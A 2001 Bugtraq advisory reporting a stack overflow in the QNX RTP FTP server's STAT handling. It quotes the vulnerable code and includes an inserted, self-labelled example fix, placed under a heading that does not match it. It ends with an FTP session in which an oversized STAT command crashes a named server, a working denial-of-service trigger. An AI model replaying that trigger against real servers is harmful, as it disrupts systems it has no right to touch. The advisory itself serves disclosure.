[18967] in bugtraq
QNX RTP ftpd stack overflow
daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Fri Feb 2 17:36:27 2001
Mail-Followup-To: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>,
bugtraq@securityfocus.com
Message-ID: <20010202200309.X675@riget.scene.pl>
Date: Fri, 2 Feb 2001 20:03:09 +0100
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
QNX RTP uses a BSD-derived FTP server, which is vulnerable to a strtok()-based
stack overflow.
Offending code from ftpd/popen.c:

    char **pop, *argv[100], *gargv[1000], *vv[2];

    /* break up string into pieces: no check against the 100 slots of argv[] */
    for (argc = 0, cp = program;; cp = NULL)
        if (!(argv[argc++] = strtok(cp, " \t\n")))
            break;

    /* glob each piece */
    gargv[0] = argv[0];
    for (gargc = argc = 1; argv[argc]; argc++) {
        argv[argc] = strdup(argv[argc]);
This code is called when the STAT command is issued. The overflow occurs when
a large number of arguments is supplied.
Identifying a vulnerable system:
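The defect is the missing bound on argv[]: strtok() keeps handing back
tokens and the loop keeps storing them, regardless of how many slots the
array has. The following is an added example, not code from the QNX or BSD
ftpd sources; it keeps the shape of the strtok() loop above but adds the
one check it lacks, and rejects the command line instead of writing past
the array. MAXARGS, split_args() and try_stat_line() are names chosen here
for illustration; the 100-entry table is the page's argv[100].

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same fixed-size table as the ftpd popen.c fragment above. The name
 * MAXARGS is hypothetical; the value 100 comes from argv[100]. */
#define MAXARGS 100

/*
 * Bounded tokenizer. `program` is modified in place (strtok() semantics).
 * Stores at most maxargs-1 tokens followed by a terminating NULL, so the
 * table is always NULL-terminated and never overrun.
 * Returns the number of tokens stored, or -1 if the command line would not
 * fit, so the caller can refuse it.
 */
int split_args(char *program, char *argv[], size_t maxargs)
{
    size_t argc = 0;
    char *cp;

    for (cp = program; ; cp = NULL) {
        /* This is the check the original loop lacks: make sure there is a
         * slot left before writing, for the token or the final NULL. */
        if (argc >= maxargs)
            return -1;
        if ((argv[argc] = strtok(cp, " \t\n")) == NULL)
            break;
        argc++;
    }
    return (int)argc;
}

/*
 * Build a STAT-style command line ("/bin/ls -lgA" plus `n` one-letter
 * arguments; constructed test input, not a captured session) and run it
 * through the bounded splitter. Returns the split_args() result, or -2 on
 * allocation failure.
 */
int try_stat_line(size_t n)
{
    char *argv[MAXARGS];
    char *line;
    size_t len = sizeof("/bin/ls -lgA") + 2 * n + 1;
    size_t i;
    int rc;

    line = malloc(len);
    if (line == NULL)
        return -2;
    strcpy(line, "/bin/ls -lgA");
    for (i = 0; i < n; i++)
        strcat(line, " a");
    rc = split_args(line, argv, MAXARGS);
    free(line);
    return rc;
}

int main(void)
{
    /* 5 tokens fit; 202 tokens are rejected rather than overrunning argv[] */
    printf("3 arguments:   split_args -> %d\n", try_stat_line(3));
    printf("200 arguments: split_args -> %d\n", try_stat_line(200));
    return 0;
}
```

With the check in place, the oversized STAT line from the session below is
refused by the splitter (return value -1) instead of corrupting the stack
frame of the calling function; a server built this way can log and reject
the command rather than drop the connection.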
220 quics.qnx.com FTP server (Version 5.60) ready.
user ftp
331 Guest login ok, send ident as password.
pass dupa
230 Guest login ok, access restrictions apply.
stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
Connection closed by foreign host.
BTW, the old BSD-derived ftpd is also used in opieftpd and SSLftpd. Both are
vulnerable to this attack.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *